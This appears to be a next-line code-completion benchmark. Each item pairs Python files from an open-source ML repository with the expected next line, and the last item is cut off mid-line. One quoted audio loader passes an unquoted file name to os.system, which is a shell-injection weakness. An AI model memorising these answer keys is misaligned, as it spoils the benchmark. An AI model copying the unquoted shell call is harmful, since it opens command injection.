prompt
stringlengths
1.74k
34.3k
ref
stringlengths
4
432
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: OPPOMKLab/u-LLaVA # Path: utils/registry.py class Registry: def register_builder(cls, name): def wrap(builder_cls): def register_model(cls, name): def wrap(model_cls): def register_processor(cls, name): def wrap(processor_cls): def register_collator(cls, name): def wrap(collator_cls): def register_task(cls, name): def wrap(task_cls): def register(cls, name, obj): def get_builder_class(cls, name): def get_model_class(cls, name): def get_processor_class(cls, name): def get_collator_class(cls, name): def get_task_class(cls, name): def list_models(cls): def list_processors(cls): def list_collators(cls): def list_builders(cls): def list_tasks(cls): def get_path(cls, name): def get(cls, name, default=None, no_warning=False): def unregister(cls, name): # Path: tasks/base_task.py class BaseTask: def __init__(self, cfg): self.cfg = cfg @staticmethod def build_model(model_cfg): model_cls = registry.get_model_class(model_cfg.arch) return model_cls.from_config(model_cfg) def build_collator(self, pad_token_id): """ :param pad_token_id: tokenizer.pad_token_id :return: data collator """ collator_type = self.cfg.get('collator_type', 'base_collator') data_collator = registry.get_collator_class(collator_type)(pad_token_id) return data_collator @staticmethod def build_processors(processors_cfg): """ :param processors_cfg: processor: clip_image: path: image_size: 224 video_train: n_frm: 8 image_size: 224 gif_train: n_frm: 8 image_size: 224 plain_box: precision: 3 :return: """ processors = dict() for idx, name in enumerate(processors_cfg): datetime_print('BUILDING PROCESSOR {0}: {1}'.format(idx + 1, name)) processor_cfg = processors_cfg[name] processor = registry.get_processor_class(name).from_config(processor_cfg) processors[name] = processor return processors @staticmethod def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'): """ Build a dictionary of datasets, keyed by split 'train', 'valid', 'test'. :param datasets_config: dataset_1 image_dir dataset_2 image_dir :param tokenizer: :param processor_dict: {'clip_image': CLIPImageProcessor()} :param conv_type: 'conv_simple' Returns: Dictionary of torch.utils.data.Dataset objects by split. datasets: { 'llava_instruct': {'train': dataset, 'test': dataset}, 'para_instruct': {'train': dataset, 'test': dataset} } """ datasets = dict() assert len(datasets_config) > 0, "At least one dataset has to be specified." for name in datasets_config: dataset_config = datasets_config[name] builder = registry.get_builder_class(name)(dataset_config) dataset = builder.build(tokenizer, processor_dict, conv_type) datasets[name] = dataset return datasets # Path: utils/tools.py def datetime_print(msg): print('[' + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S,%f")[:-3] + '] ' + msg) # Path: datasets/datasets/concat_dataset.py class ConcatDataset(Dataset): def __init__(self, datasets: Sequence[BaseDataset]): self.concat_dataset = TorchConcatDataset(datasets) def __len__(self): return len(self.concat_dataset) def __getitem__(self, index): return self.concat_dataset[index] # Path: datasets/datasets/concat_dataset.py class ConcatDatasetWithShuffle(Subset): def __init__(self, datasets: Sequence[BaseDataset], seed=42, portion=1): self.seed = seed self.portion = portion dataset = TorchConcatDataset(datasets) target_len = int(len(dataset) * portion) indices = list(range(len(dataset))) * int(np.ceil(portion)) rng = np.random.default_rng(seed) rng.shuffle(indices) indices = indices[:target_len] super().__init__(dataset, indices) # Path: tasks/image_text_pretrain.py from utils.registry import registry from tasks.base_task import BaseTask from utils.tools import datetime_print from datasets.datasets.concat_dataset import ConcatDataset, ConcatDatasetWithShuffle """ Partially Adapted form: https://github.com/DAMO-NLP-SG/Video-LLaMA/blob/main/video_llama/tasks/image_text_pretrain.py """ @registry.register_task("image_text_pretrain") class ImageTextPretrainTask(BaseTask): def __init__(self, cfg): super().__init__(cfg) @staticmethod def build_datasets(datasets_config, tokenizer, processor_dict, conv_type='conv_simple'): """ :param datasets_config: :param tokenizer: :param processor_dict: {'clip_image': CLIPImageProcessor()} :param conv_type: :return: """ assert len(datasets_config) > 0, "At least one dataset has to be specified." if len(datasets_config) == 1: name = list(datasets_config.keys())[0] dataset_config = datasets_config[name] builder = registry.get_builder_class(name)(dataset_config) # {"train": dataset, "test": dataset} dataset = builder.build(tokenizer, processor_dict, conv_type) else: shuffle = True portion = 1 dataset_list = [] for idx, name in enumerate(datasets_config): datetime_print('BUILDING DATASET {0}: {1}'.format(idx+1, name)) dataset_config = datasets_config[name] builder = registry.get_builder_class(name)(dataset_config) current_dataset = builder.build(tokenizer, processor_dict, conv_type) dataset_list.append(current_dataset) if shuffle: dataset = ConcatDatasetWithShuffle(dataset_list, portion=portion) else:
dataset = ConcatDataset(dataset_list)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: shashikg/WhisperS2T # Path: whisper_s2t/audio.py def pad_or_trim(array, length: int = N_SAMPLES, *, axis: int = -1): """ Pad or trim the audio array to N_SAMPLES, as expected by the encoder. """ if torch.is_tensor(array): if array.shape[axis] > length: array = array.index_select( dim=axis, index=torch.arange(length, device=array.device) ) if array.shape[axis] < length: pad_widths = [(0, 0)] * array.ndim pad_widths[axis] = (0, length - array.shape[axis]) array = F.pad(array, [pad for sizes in pad_widths[::-1] for pad in sizes]) else: if array.shape[axis] > length: array = array.take(indices=range(length), axis=axis) if array.shape[axis] < length: pad_widths = [(0, 0)] * array.ndim pad_widths[axis] = (0, length - array.shape[axis]) array = np.pad(array, pad_widths) return array # Path: whisper_s2t/audio.py def audio_batch_generator(audio_files): return THREAD_POOL_AUDIO_LOADER.imap(load_audio, audio_files) # Path: whisper_s2t/audio.py def load_audio(input_file, sr=16000, return_duration=False): try: with wave.open(input_file, 'rb') as wf: if (wf.getframerate() != sr) or (wf.getnchannels() != 1): raise Exception("Not a 16kHz wav mono channel file!") frames = wf.getnframes() x = wf.readframes(int(frames)) except: with tempfile.TemporaryDirectory() as tmpdir: wav_file = f"{tmpdir}/tmp.wav" ret_code = os.system(f'ffmpeg -hide_banner -loglevel panic -i {input_file} -threads 1 -acodec pcm_s16le -ac 1 -af aresample=resampler={RESAMPLING_ENGINE} -ar {sr} {wav_file} -y') if ret_code != 0: raise RuntimeError("ffmpeg failed to resample the input audio file, make sure ffmpeg is compiled properly!") with wave.open(wav_file, 'rb') as wf: frames = wf.getnframes() x = wf.readframes(int(frames)) audio_signal = np.frombuffer(x, np.int16).flatten().astype(np.float32)/32768.0 audio_duration = len(audio_signal)/sr if return_duration: return audio_signal, audio_duration else: return audio_signal # Path: whisper_s2t/data.py import torch import numpy as np from tqdm import tqdm from .configs import * from .audio import pad_or_trim, audio_batch_generator, load_audio def stitch_speech_segments(start_ends, max_len=27.0, max_silent_region=None): speech_duration = [end - start for start, end in start_ends] stitched_speech_segments = [] curr_seg = [0] curr_dur = speech_duration[0] idx = 1 while idx < len(start_ends): if curr_dur + speech_duration[idx] > max_len: stitched_speech_segments.append([start_ends[_] for _ in curr_seg]) curr_seg = [idx] curr_dur = speech_duration[idx] else: curr_dur += speech_duration[idx] curr_seg.append(idx) idx += 1 stitched_speech_segments.append([start_ends[_] for _ in curr_seg]) if max_silent_region is None: return stitched_speech_segments stitched_speech_segments_joined = [] for segs in stitched_speech_segments: _segs = [] curr_seg_start_time, curr_seg_end_time = segs[0] for i in range(1, len(segs)): if (segs[i][0] - curr_seg_end_time) >= max_silent_region: _segs.append((curr_seg_start_time, curr_seg_end_time)) curr_seg_start_time = segs[i][0] curr_seg_end_time = segs[i][1] _segs.append((curr_seg_start_time, curr_seg_end_time)) stitched_speech_segments_joined.append(_segs) return stitched_speech_segments_joined class WhisperDataset(torch.utils.data.Dataset): def __init__(self, audio_files, lang_codes, tasks, initial_prompts, tokenizer, max_initial_prompt_len, device="cuda", dta_padding=48000, without_timestamps=True, use_dynamic_time_axis=False): self.audio_files = audio_files self.lang_codes = lang_codes self.tasks = tasks self.initial_prompts = initial_prompts self.tokenizer = tokenizer self.device = device self.dta_padding = dta_padding self.without_timestamps = without_timestamps self.use_dynamic_time_axis = use_dynamic_time_axis self.max_initial_prompt_len = max_initial_prompt_len if type(audio_files[0]) == str: self.get_audio_signal = self._get_audio_signal_from_file else: self.get_audio_signal = self._get_audio_signal_from_array def _get_audio_signal_from_array(self, item): return self.audio_files[item] def _get_audio_signal_from_file(self, item):
return load_audio(self.audio_files[item])
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: chinhsuanwu/ifusion # Path: ldm/thirdp/psp/helpers.py def get_blocks(num_layers): if num_layers == 50: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=4), get_block(in_channel=128, depth=256, num_units=14), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 100: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=13), get_block(in_channel=128, depth=256, num_units=30), get_block(in_channel=256, depth=512, num_units=3) ] elif num_layers == 152: blocks = [ get_block(in_channel=64, depth=64, num_units=3), get_block(in_channel=64, depth=128, num_units=8), get_block(in_channel=128, depth=256, num_units=36), get_block(in_channel=256, depth=512, num_units=3) ] else: raise ValueError("Invalid number of layers: {}. Must be one of [50, 100, 152]".format(num_layers)) return blocks # Path: ldm/thirdp/psp/helpers.py class Flatten(Module): def forward(self, input): return input.view(input.size(0), -1) # Path: ldm/thirdp/psp/helpers.py class bottleneck_IR(Module): def __init__(self, in_channel, depth, stride): super(bottleneck_IR, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth) ) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth) ) def forward(self, x): shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut # Path: ldm/thirdp/psp/helpers.py class bottleneck_IR_SE(Module): def __init__(self, in_channel, depth, stride): super(bottleneck_IR_SE, self).__init__() if in_channel == depth: self.shortcut_layer = MaxPool2d(1, stride) else: self.shortcut_layer = Sequential( Conv2d(in_channel, depth, (1, 1), stride, bias=False), BatchNorm2d(depth) ) self.res_layer = Sequential( BatchNorm2d(in_channel), Conv2d(in_channel, depth, (3, 3), (1, 1), 1, bias=False), PReLU(depth), Conv2d(depth, depth, (3, 3), stride, 1, bias=False), BatchNorm2d(depth), SEModule(depth, 16) ) def forward(self, x): shortcut = self.shortcut_layer(x) res = self.res_layer(x) return res + shortcut # Path: ldm/thirdp/psp/helpers.py def l2_norm(input, axis=1): norm = torch.norm(input, 2, axis, True) output = torch.div(input, norm) return output # Path: ldm/thirdp/psp/model_irse.py from torch.nn import ( Linear, Conv2d, BatchNorm1d, BatchNorm2d, PReLU, Dropout, Sequential, Module, ) from ldm.thirdp.psp.helpers import ( get_blocks, Flatten, bottleneck_IR, bottleneck_IR_SE, l2_norm, ) # https://github.com/eladrich/pixel2style2pixel """ Modified Backbone implementation from [TreB1eN](https://github.com/TreB1eN/InsightFace_Pytorch) """ class Backbone(Module): def __init__(self, input_size, num_layers, mode="ir", drop_ratio=0.4, affine=True): super(Backbone, self).__init__() assert input_size in [112, 224], "input_size should be 112 or 224" assert num_layers in [50, 100, 152], "num_layers should be 50, 100 or 152" assert mode in ["ir", "ir_se"], "mode should be ir or ir_se" blocks = get_blocks(num_layers) if mode == "ir": unit_module = bottleneck_IR elif mode == "ir_se":
unit_module = bottleneck_IR_SE
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: wangzhecheng/SkyScript # Path: src/open_clip/factory.py def create_model_from_pretrained( model_name: str, pretrained: Optional[str] = None, precision: str = 'fp32', device: Union[str, torch.device] = 'cpu', jit: bool = False, force_quick_gelu: bool = False, force_custom_text: bool = False, force_image_size: Optional[Union[int, Tuple[int, int]]] = None, return_transform: bool = True, image_mean: Optional[Tuple[float, ...]] = None, image_std: Optional[Tuple[float, ...]] = None, cache_dir: Optional[str] = None, ): model = create_model( model_name, pretrained, precision=precision, device=device, jit=jit, force_quick_gelu=force_quick_gelu, force_custom_text=force_custom_text, force_image_size=force_image_size, cache_dir=cache_dir, require_pretrained=True, ) if not return_transform: return model image_mean = image_mean or getattr(model.visual, 'image_mean', None) image_std = image_std or getattr(model.visual, 'image_std', None) preprocess = image_transform( model.visual.image_size, is_train=False, mean=image_mean, std=image_std, ) return model, preprocess # Path: src/open_clip/factory.py def get_model_config(model_name): if model_name in _MODEL_CONFIGS: return deepcopy(_MODEL_CONFIGS[model_name]) else: return None # Path: src/open_clip/factory.py def get_tokenizer(model_name): if model_name.startswith(HF_HUB_PREFIX): tokenizer = HFTokenizer(model_name[len(HF_HUB_PREFIX):]) else: config = get_model_config(model_name) tokenizer = HFTokenizer( config['text_cfg']['hf_tokenizer_name']) if 'hf_tokenizer_name' in config['text_cfg'] else tokenize return tokenizer # Path: src/open_clip/tokenizer.py class HFTokenizer: """HuggingFace tokenizer wrapper""" def __init__(self, tokenizer_name: str): from transformers import AutoTokenizer self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_name) def save_pretrained(self, dest): self.tokenizer.save_pretrained(dest) def __call__(self, texts: Union[str, List[str]], context_length: int = 77) -> torch.Tensor: # same cleaning as for default tokenizer, except lowercasing # adding lower (for case-sensitive tokenizers) will make it more robust but less sensitive to nuance if isinstance(texts, str): texts = [texts] texts = [whitespace_clean(basic_clean(text)) for text in texts] input_ids = self.tokenizer( texts, return_tensors='pt', max_length=context_length, padding='max_length', truncation=True, ).input_ids return input_ids # Path: src/open_clip/push_to_hf_hub.py import argparse import json import os import torch import safetensors.torch from pathlib import Path from tempfile import TemporaryDirectory from typing import Optional, Tuple, Union from huggingface_hub import ( create_repo, get_hf_file_metadata, hf_hub_download, hf_hub_url, repo_type_and_id_from_hf_id, upload_folder, list_repo_files, ) from huggingface_hub.utils import EntryNotFoundError from .factory import create_model_from_pretrained, get_model_config, get_tokenizer from .tokenizer import HFTokenizer """ Adapted from https://github.com/mlfoundations/open_clip. Copyright (c) 2012-2021 Gabriel Ilharco, Mitchell Wortsman, Nicholas Carlini, Rohan Taori, Achal Dave, Vaishaal Shankar, John Miller, Hongseok Namkoong, Hannaneh Hajishirzi, Ali Farhadi, Ludwig Schmidt """ try: _has_hf_hub = True except ImportError: _has_hf_hub = False try: _has_safetensors = True except ImportError: _has_safetensors = False # Default name for a weights file hosted on the Huggingface Hub. HF_WEIGHTS_NAME = "open_clip_pytorch_model.bin" # default pytorch pkl HF_SAFE_WEIGHTS_NAME = "open_clip_model.safetensors" # safetensors version HF_CONFIG_NAME = 'open_clip_config.json' def save_config_for_hf( model, config_path: str, model_config: Optional[dict] ): preprocess_cfg = { 'mean': model.visual.image_mean, 'std': model.visual.image_std, } hf_config = { 'model_cfg': model_config, 'preprocess_cfg': preprocess_cfg, } with config_path.open('w') as f: json.dump(hf_config, f, indent=2) def save_for_hf( model,
tokenizer: HFTokenizer,
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Lavreniuk/EVP # Path: evp/models.py class UNetWrapper(nn.Module): def __init__(self, unet, use_attn=True, base_size=512, max_attn_size=None, attn_selector='up_cross+down_cross') -> None: super().__init__() self.unet = unet self.attention_store = AttentionStore(base_size=base_size // 8, max_size=max_attn_size) self.size16 = base_size // 32 self.size32 = base_size // 16 self.size64 = base_size // 8 self.use_attn = use_attn if self.use_attn: register_attention_control(unet, self.attention_store) register_hier_output(unet) self.attn_selector = attn_selector.split('+') def forward(self, *args, **kwargs): if self.use_attn: self.attention_store.reset() out_list = self.unet(*args, **kwargs) if self.use_attn: avg_attn = self.attention_store.get_average_attention() attn16, attn32, attn64 = self.process_attn(avg_attn) out_list[1] = torch.cat([out_list[1], attn16], dim=1) out_list[2] = torch.cat([out_list[2], attn32], dim=1) if attn64 is not None: out_list[3] = torch.cat([out_list[3], attn64], dim=1) return out_list[::-1] def process_attn(self, avg_attn): attns = {self.size16: [], self.size32: [], self.size64: []} for k in self.attn_selector: for up_attn in avg_attn[k]: size = int(math.sqrt(up_attn.shape[1])) attns[size].append(rearrange(up_attn, 'b (h w) c -> b c h w', h=size)) attn16 = torch.stack(attns[self.size16]).mean(0) attn32 = torch.stack(attns[self.size32]).mean(0) if len(attns[self.size64]) > 0: attn64 = torch.stack(attns[self.size64]).mean(0) else: attn64 = None return attn16, attn32, attn64 # Path: evp/models.py class TextAdapterDepth(nn.Module): def __init__(self, text_dim=768): super().__init__() self.fc = nn.Sequential( nn.Linear(text_dim, text_dim), nn.GELU(), nn.Linear(text_dim, text_dim) ) def forward(self, latents, texts, gamma): # use the gamma to blend n_sen, channel = texts.shape bs = latents.shape[0] texts_after = self.fc(texts) texts = texts + gamma * texts_after texts = repeat(texts, 'n c -> n b c', b=1) return texts # Path: depth/models_depth/model_vpd.py import torch import torch.nn as nn import torch.nn.functional as F from timm.models.layers import trunc_normal_, DropPath from mmcv.cnn import (build_conv_layer, build_norm_layer, build_upsample_layer, constant_init, normal_init) from omegaconf import OmegaConf from ldm.util import instantiate_from_config from evp.models import UNetWrapper, TextAdapterDepth # ------------------------------------------------------------------------------ # Copyright (c) Microsoft # Licensed under the MIT License. # The deconvolution code is based on Simple Baseline. # (https://github.com/microsoft/human-pose-estimation.pytorch/blob/master/lib/models/pose_resnet.py) # Modified by Zigang Geng ([email protected]). # ------------------------------------------------------------------------------ class VPDDepthEncoder(nn.Module): def __init__(self, out_dim=1024, ldm_prior=[320, 640, 1280+1280], sd_path=None, text_dim=768, dataset='nyu' ): super().__init__() self.layer1 = nn.Sequential( nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1), nn.GroupNorm(16, ldm_prior[0]), nn.ReLU(), nn.Conv2d(ldm_prior[0], ldm_prior[0], 3, stride=2, padding=1), ) self.layer2 = nn.Sequential( nn.Conv2d(ldm_prior[1], ldm_prior[1], 3, stride=2, padding=1), ) self.out_layer = nn.Sequential( nn.Conv2d(sum(ldm_prior), out_dim, 1), nn.GroupNorm(16, out_dim), nn.ReLU(), ) self.apply(self._init_weights) ### stable diffusion layers config = OmegaConf.load('./v1-inference.yaml') if sd_path is None: config.model.params.ckpt_path = '../checkpoints/v1-5-pruned-emaonly.ckpt' else: config.model.params.ckpt_path = f'../{sd_path}' sd_model = instantiate_from_config(config.model) self.encoder_vq = sd_model.first_stage_model self.unet = UNetWrapper(sd_model.model, use_attn=False) del sd_model.cond_stage_model del self.encoder_vq.decoder del self.unet.unet.diffusion_model.out for param in self.encoder_vq.parameters(): param.requires_grad = False if dataset == 'nyu':
self.text_adapter = TextAdapterDepth(text_dim=text_dim)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: penghao-wu/vstar # Path: VisualSearch/model/owlvit/util/box_ops.py def box_cxcywh_to_xyxy(x): def box_xyxy_to_cxcywh(x): def box_iou(boxes1, boxes2): def generalized_box_iou(boxes1, boxes2): def masks_to_boxes(masks): # Path: VisualSearch/model/owlvit/util/misc.py class NestedTensor(object): def __init__(self, tensors, mask: Optional[Tensor]): self.tensors = tensors self.mask = mask def to(self, device, non_blocking=False): # type: (Device) -> NestedTensor # noqa cast_tensor = self.tensors.to(device, non_blocking=non_blocking) mask = self.mask if mask is not None: assert mask is not None cast_mask = mask.to(device, non_blocking=non_blocking) else: cast_mask = None return NestedTensor(cast_tensor, cast_mask) def record_stream(self, *args, **kwargs): self.tensors.record_stream(*args, **kwargs) if self.mask is not None: self.mask.record_stream(*args, **kwargs) def decompose(self): return self.tensors, self.mask def __repr__(self): return str(self.tensors) # Path: VisualSearch/model/owlvit/util/misc.py def interpolate(input, size=None, scale_factor=None, mode="nearest", align_corners=None): # type: (Tensor, Optional[List[int]], Optional[float], str, Optional[bool]) -> Tensor """ Equivalent to nn.functional.interpolate, but with support for empty batch sizes. This will eventually be supported natively by PyTorch, and this class can go away. """ if float(torchvision.__version__[:3]) < 0.7: if input.numel() > 0: return torch.nn.functional.interpolate( input, size, scale_factor, mode, align_corners ) output_shape = _output_size(2, input, size, scale_factor) output_shape = list(input.shape[:-2]) + list(output_shape) if float(torchvision.__version__[:3]) < 0.5: return _NewEmptyTensorOp.apply(input, output_shape) return _new_empty_tensor(input, output_shape) else: return torchvision.ops.misc.interpolate(input, size, scale_factor, mode, align_corners) # Path: VisualSearch/model/owlvit/util/misc.py def nested_tensor_from_tensor_list(tensor_list: List[Tensor]): # TODO make this more general if tensor_list[0].ndim == 3: # TODO make it support different-sized images max_size = _max_by_axis([list(img.shape) for img in tensor_list]) # min_size = tuple(min(s) for s in zip(*[img.shape for img in tensor_list])) batch_shape = [len(tensor_list)] + max_size b, c, h, w = batch_shape dtype = tensor_list[0].dtype device = tensor_list[0].device tensor = torch.zeros(batch_shape, dtype=dtype, device=device) mask = torch.ones((b, h, w), dtype=torch.bool, device=device) for img, pad_img, m in zip(tensor_list, tensor, mask): pad_img[: img.shape[0], : img.shape[1], : img.shape[2]].copy_(img) m[: img.shape[1], :img.shape[2]] = False else: raise ValueError('not supported') return NestedTensor(tensor, mask) # Path: VisualSearch/model/owlvit/segmentation.py import io import torch import torch.nn as nn import torch.nn.functional as F from collections import defaultdict from PIL import Image from .util import box_ops from .util.misc import NestedTensor, interpolate, nested_tensor_from_tensor_list from panopticapi.utils import id2rgb, rgb2id # ------------------------------------------------------------------------ # Deformable DETR # Copyright (c) 2020 SenseTime. All Rights Reserved. # Licensed under the Apache License, Version 2.0 [see LICENSE for details] # ------------------------------------------------------------------------ # Modified from DETR (https://github.com/facebookresearch/detr) # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved # ------------------------------------------------------------------------ """ This file provides the definition of the convolutional heads used to predict masks, as well as the losses """ try: except ImportError: pass class DETRsegm(nn.Module): def __init__(self, detr, freeze_detr=False): super().__init__() self.detr = detr if freeze_detr: for p in self.parameters(): p.requires_grad_(False) hidden_dim, nheads = detr.transformer.d_model, detr.transformer.nhead self.bbox_attention = MHAttentionMap(hidden_dim, hidden_dim, nheads, dropout=0) self.mask_head = MaskHeadSmallConv(hidden_dim + nheads, [1024, 512, 256], hidden_dim) def forward(self, samples: NestedTensor): if not isinstance(samples, NestedTensor):
samples = nested_tensor_from_tensor_list(samples)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: ValdonVitija/crap # Path: crap/file_analyzer.py class PythonFileAnalyzer: def __init__(self, file_path: pathlib.Path): self.file_path = file_path self.imported_modules = set() def analyze(self): """ Analyzes the Python file and extracts the imported modules. """ code = self.file_path.read_text() tree = ast.parse(code) visitor = ImportsVisitor() visitor.visit(tree) self.imported_modules = visitor.imported_modules # Path: crap/virtual_env_checker.py class VirtualEnvChecker: def __init__(self): self.venv_indicators = { "linux": {"bin", "include", "lib", "pyvenv.cfg"}, "win32": {"Scripts", "Include", "Lib", "pyvenv.cfg"} } def is_likely_venv(self, path): """ Checks if the given path is likely to be a virtual environment. Args: path (str): The path to check. Returns: bool: True if the path is likely to be a virtual environment, False otherwise. """ platform = sys.platform indicators = self.venv_indicators.get(platform, set()) return all(os.path.exists(os.path.join(path, ind)) for ind in indicators) # Path: crap/package_usage_counter.py class PackageUsageCounter: def __init__(self): self.pack_counter = get_package_counter_dict() def increment_package_count(self, package): if package in self.pack_counter: self.pack_counter[package] += 1 def get_unused_packages(self, important_packages) -> List[str]: """ Returns a list of unused packages. A package is considered unused if its count is 0 and it is not in the list of important packages. Args: important_packages (List[str]): A list of important packages. Returns: List[str]: A list of unused packages. """ return [pkg for pkg, count in self.pack_counter.items() if count == 0 and pkg not in important_packages] # Path: crap/subprocesses.py def uninstall_package(package_name: str): """Uninstall a given package.""" execute_command_without_output(["pip3", "uninstall", "-y", package_name]) # Path: crap/subprocesses.py def pre_cleanup_with_ruff(path_): """ Pre cleanup with ruff """ execute_command_without_output(["ruff", "check", path_, "--fix"]) # Path: crap/subprocesses.py def reinstall_from_requirements() -> None: """Reinstall packages from requirements.txt.""" req_path = pathlib.Path(__file__).parent / "data" / "req.txt" execute_command_without_output( ["pip3", "install", "-r", req_path, "--no-cache-dir"] ) # Path: crap/subprocesses.py def freeze_into_requirements(): """Freeze current environment to requirements.txt.""" req_path = pathlib.Path(__file__).parent / "data" / "req.txt" try: with open(req_path, "w") as file_: subprocess.run(["pip3", "freeze"], stdout=file_) except Exception as ex: print(ex) # Path: crap/subprocesses.py def get_current_packages() -> set: """Get the current packages installed in the environment.""" process = subprocess.run(["pip3", "freeze"], capture_output=True, text=True) output = process.stdout.strip() packages = set(line.split("==")[0] for line in output.split("\n")) return packages # Path: crap/crap_manager.py import os import pathlib from typing import Set from tqdm import tqdm from crap.file_analyzer import PythonFileAnalyzer from crap.virtual_env_checker import VirtualEnvChecker from crap.package_usage_counter import PackageUsageCounter from crap.subprocesses import ( uninstall_package, pre_cleanup_with_ruff, reinstall_from_requirements, freeze_into_requirements, get_current_packages ) class CrapManager: __slots__ = ("path_", "venv_checker", "package_usage_counter", "deleted_packages") def __init__(self, path_: str): self.path_ = pathlib.Path(path_).absolute() self.venv_checker = VirtualEnvChecker() self.package_usage_counter = PackageUsageCounter() self.deleted_packages = set() def run(self): if not self.path_.exists(): raise FileNotFoundError("File/Dir not found") total_steps = 4 bar_width = 100 bar_color = 'red' with tqdm(total=total_steps, ncols=bar_width, colour=bar_color) as pbar: self._process_path() pbar.update(1)
initial_packages = get_current_packages()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: worm128/AI-YinMei # Path: text-generation-webui/extensions/openai/typing.py class ChatCompletionRequest(GenerationOptions, ChatCompletionRequestParams): pass # Path: text-generation-webui/extensions/openai/typing.py class ChatCompletionResponse(BaseModel): id: str choices: List[dict] created: int = int(time.time()) model: str object: str = "chat.completion" usage: dict # Path: text-generation-webui/extensions/openai/typing.py class CompletionRequest(GenerationOptions, CompletionRequestParams): pass # Path: text-generation-webui/extensions/openai/typing.py class CompletionResponse(BaseModel): id: str choices: List[dict] created: int = int(time.time()) model: str object: str = "text_completion" usage: dict # Path: text-generation-webui/extensions/openai/typing.py class DecodeRequest(BaseModel): tokens: List[int] # Path: text-generation-webui/extensions/openai/typing.py class DecodeResponse(BaseModel): text: str # Path: text-generation-webui/extensions/openai/typing.py class EmbeddingsRequest(BaseModel): input: str | List[str] model: str | None = Field(default=None, description="Unused parameter. To change the model, set the OPENEDAI_EMBEDDING_MODEL and OPENEDAI_EMBEDDING_DEVICE environment variables before starting the server.") encoding_format: str = Field(default="float", description="Can be float or base64.") user: str | None = Field(default=None, description="Unused parameter.") # Path: text-generation-webui/extensions/openai/typing.py class EmbeddingsResponse(BaseModel): index: int embedding: List[float] object: str = "embedding" # Path: text-generation-webui/extensions/openai/typing.py class EncodeRequest(BaseModel): text: str # Path: text-generation-webui/extensions/openai/typing.py class EncodeResponse(BaseModel): tokens: List[int] length: int # Path: text-generation-webui/extensions/openai/typing.py class LoadLorasRequest(BaseModel): lora_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class LoadModelRequest(BaseModel): model_name: str args: dict | None = None settings: dict | None = None # Path: text-generation-webui/extensions/openai/typing.py class LogitsRequest(GenerationOptions, LogitsRequestParams): pass # Path: text-generation-webui/extensions/openai/typing.py class LogitsResponse(BaseModel): logits: dict # Path: text-generation-webui/extensions/openai/typing.py class LoraListResponse(BaseModel): lora_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class ModelInfoResponse(BaseModel): model_name: str lora_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class ModelListResponse(BaseModel): model_names: List[str] # Path: text-generation-webui/extensions/openai/typing.py class TokenCountResponse(BaseModel): length: int # Path: text-generation-webui/extensions/openai/typing.py def to_dict(obj): return obj.__dict__ # Path: text-generation-webui/extensions/openai/script.py import asyncio import json import os import traceback import speech_recognition as sr import uvicorn import extensions.openai.completions as OAIcompletions import extensions.openai.embeddings as OAIembeddings import extensions.openai.images as OAIimages import extensions.openai.logits as OAIlogits import extensions.openai.models as OAImodels import extensions.openai.moderations as OAImoderations from threading import Thread from fastapi import Depends, FastAPI, Header, HTTPException from fastapi.middleware.cors import CORSMiddleware from fastapi.requests import Request from fastapi.responses import JSONResponse from pydub import AudioSegment from sse_starlette import EventSourceResponse from extensions.openai.errors import ServiceUnavailableError from extensions.openai.tokens import token_count, token_decode, token_encode from extensions.openai.utils import _start_cloudflared from modules import shared from modules.logging_colors import logger from modules.models import unload_model from modules.text_generation import stop_everything_event from .typing import ( ChatCompletionRequest, ChatCompletionResponse, CompletionRequest, CompletionResponse, DecodeRequest, DecodeResponse, EmbeddingsRequest, EmbeddingsResponse, EncodeRequest, EncodeResponse, LoadLorasRequest, LoadModelRequest, LogitsRequest, LogitsResponse, LoraListResponse, ModelInfoResponse, ModelListResponse, TokenCountResponse, to_dict ) params = { 'embedding_device': 'cpu', 'embedding_model': 'sentence-transformers/all-mpnet-base-v2', 'sd_webui_url': '', 'debug': 0 } streaming_semaphore = asyncio.Semaphore(1) def verify_api_key(authorization: str = Header(None)) -> None: expected_api_key = shared.args.api_key if expected_api_key and (authorization is None or 